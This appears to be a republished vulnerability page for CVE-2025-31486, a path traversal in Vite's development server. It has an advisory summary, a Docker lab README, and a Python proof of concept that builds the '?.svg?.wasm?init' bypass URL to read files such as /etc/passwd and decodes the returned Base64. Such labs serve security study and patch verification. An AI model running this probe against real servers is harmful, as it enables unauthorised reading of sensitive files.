Vite Path Traversal Vulnerability

Vulnerability information

Vulnerability name: Vite Path Traversal Vulnerability

Identifiers:

  • CVE: CVE-2025-31486

Vulnerability type: Directory traversal

Severity: High

Description: The vulnerability lies in the Vite development server. Vite is a modern web build tool widely used for fast development and bundling of front-end projects. The flaw lets an attacker craft a special URL that bypasses the dev server's file-access restrictions, performs directory traversal and reads arbitrary files from the local file system. The root cause is the way Vite's asset plugin handles URLs: by appending particular query suffixes (such as ?.svg?.wasm?init) an attacker can make the server skip a critical security check (specifically the server.fs.deny check) and read sensitive files such as /etc/passwd. Exploitation requires that the project use a vulnerable Vite version and that the development server be exposed on the network via the --host flag. The asset inline limit (default 4 KB) also affects the attack, because Vite inlines files below this limit into the response as Base64 strings. The vulnerability can disclose sensitive information and can be exploited remotely without authentication, so it poses a serious threat to affected systems.

Vendor: Vite

Product: Vite

Source: https://github.com/hackmelocal/CVE-2025-31486-Simulation

Category: CVE-2025: github search

Repository files

  • Dockerfile
  • README.md
  • app
  • docker-compose.yml

Source overview

Vite Path Traversal Lab (CVE-2025-31486)

Open in GitHub Codespaces
License: MIT

A hands-on, containerized lab environment to simulate and exploit the Path Traversal vulnerability in Vite’s development server, identified as CVE-2025-31486.

📖 About The Vulnerability

This lab demonstrates a significant Path Traversal vulnerability found in older versions of Vite, a modern web development build tool. The vulnerability allows an attacker to bypass security constraints in the Vite development server and read arbitrary files from the local file system.

The core of the issue lies in how Vite’s asset plugin processes URLs. By crafting a request URL with query suffixes such as ?.svg and ?.wasm?init, an attacker can make the server skip a critical security check (specifically the server.fs.deny check, which is applied to the raw request path), granting access to sensitive files like /etc/passwd.

Conditions for Exploitation

  • Vulnerable Vite Version: The project must use a vulnerable version of Vite (the issue was fixed in 6.2.5, 6.1.4, 6.0.14, 5.4.17 and 4.5.12; earlier releases in each line are affected).
  • Exposed Dev Server: The dev server must be exposed to the network using the --host flag (or the equivalent server.host config option); a server bound only to localhost is reachable only from the same machine.
  • File Size Limit: The exploit works best for files smaller than build.assetsInlineLimit (default 4 KB), because Vite inlines such files into its response as Base64 strings; larger files are not inlined and are not returned this way.
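The following Python script is an added example, not code from the lab repository or from Vite: it builds the probe URL described above and decodes the module body a vulnerable server is assumed to return. The response shape (an ES module `export default "data:image/svg+xml;base64,..."`, or the percent-encoded `data:image/svg+xml,...` variant) and the sample file content are assumptions constructed for the example; the lab's own one-line exploit command is not reproduced on this page.

```python
"""Probe-URL builder and response decoder for the Vite dev-server traversal
described above (CVE-2025-31486).

Added example, not code from the lab repository or from Vite. Assumptions:
  * a vulnerable server answers GET <path>?.svg?.wasm?init with an ES module
    whose body is  export default "data:image/svg+xml;base64,<b64>"  (or the
    percent-encoded form  data:image/svg+xml,<encoded>) when the file is below
    build.assetsInlineLimit;
  * SAMPLE_FILE / SAMPLE_RESPONSE are constructed here so the script runs offline.
"""
import base64
import re
import urllib.parse
import urllib.request
from typing import Optional

# Query suffix from the advisory: Vite's asset handling mistakes the request for
# an SVG/wasm asset and skips the server.fs.deny check.
BYPASS_SUFFIX = "?.svg?.wasm?init"

_INLINE_RE = re.compile(
    r'export\s+default\s+"(data:image/svg\+xml(?:;base64)?,[^"]*)"'
)


def build_probe_url(base_url: str, target_path: str) -> str:
    """Return the URL that requests target_path through the asset/wasm path.

    The path is inserted verbatim (the bypass depends on Vite seeing the
    literal query string), so pass e.g. "/etc/passwd" or "/.env".
    """
    return base_url.rstrip("/") + "/" + target_path.lstrip("/") + BYPASS_SUFFIX


def decode_inlined_asset(body: str) -> Optional[bytes]:
    """Recover the file content from an inlined data-URL module.

    Returns None when the body is not an inlined asset (e.g. a 403 page or a
    normal module), which is the expected result against a patched server.
    """
    m = _INLINE_RE.search(body)
    if not m:
        return None
    header, payload = m.group(1).split(",", 1)
    if header.endswith(";base64"):
        return base64.b64decode(payload)
    # Small SVGs may be percent-encoded instead of base64-encoded.
    return urllib.parse.unquote(payload).encode()


def probe(base_url: str, target_path: str, timeout: float = 5.0) -> Optional[bytes]:
    """Fetch the probe URL from a server you are authorised to test and decode it."""
    req = urllib.request.Request(build_probe_url(base_url, target_path))
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return decode_inlined_asset(resp.read().decode("utf-8", "replace"))


# Constructed sample: the module body a vulnerable server is assumed to return
# for a small /etc/passwd-like file (built locally, nothing is fetched).
SAMPLE_FILE = b"root:x:0:0:root:/root:/bin/bash\n"
SAMPLE_RESPONSE = (
    'export default "data:image/svg+xml;base64,'
    + base64.b64encode(SAMPLE_FILE).decode()
    + '"\n'
)

if __name__ == "__main__":
    print(build_probe_url("http://localhost:5173", "/etc/passwd"))
    print(decode_inlined_asset(SAMPLE_RESPONSE).decode())
```

Run `probe("http://<host>:5173", "/etc/passwd")` only against a server you are authorised to test; a `None` result (or an HTTP 403 raised by urllib) is the expected outcome on a patched Vite, while decoded file bytes indicate the bypass still works. The hostname, port and paths are illustrative assumptions.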

🎯 Live Simulation Lab

This repository contains everything you need to safely run a vulnerable Vite server and perform the exploit yourself. You can run the simulation in two ways:

Method 1: Run in GitHub Codespaces

Get a full, cloud-based development environment in seconds. No local setup required.

  1. Launch Codespace: Click the “Open in GitHub Codespaces” button at the top of this README.

  2. Wait for Setup: GitHub will prepare your cloud environment. This might take a minute. A terminal will appear at the bottom of the editor once it’s ready.

  3. Start the Vulnerable Server: In the terminal, run the following single command:

    docker compose up

    You will see output indicating that the vulnerable Vite development server is running and accessible.

  4. Perform the Exploit:

    • Open a new terminal in your Codespace (Click the + icon in the terminal panel).
    • Copy and paste the one-line exploit command below into the new terminal and press Enter.

Method 2: Run Locally

If you prefer to run the lab on your own machine, follow these steps.

Prerequisites:

Instructions:

  1. Clone the Repository:

    git clone https://github.com/hackmelocal/CVE-2025-31486-Simulation.git
    cd CVE-2025-31486-Simulation
  2. Start the Vulnerable Server: In your terminal, run the single command:

    docker compose up

    This command will build the Docker image (if not already built) and start the vulnerable Vite server.

  3. Perform the Exploit:

    • Open a new, separate terminal window or tab.
    • Copy and paste the one-line exploit command below into the new terminal and press Enter.

Source page: http://example.com/2025/07/24/github_615196653/
Author: lianccc
Published: 24 July 2025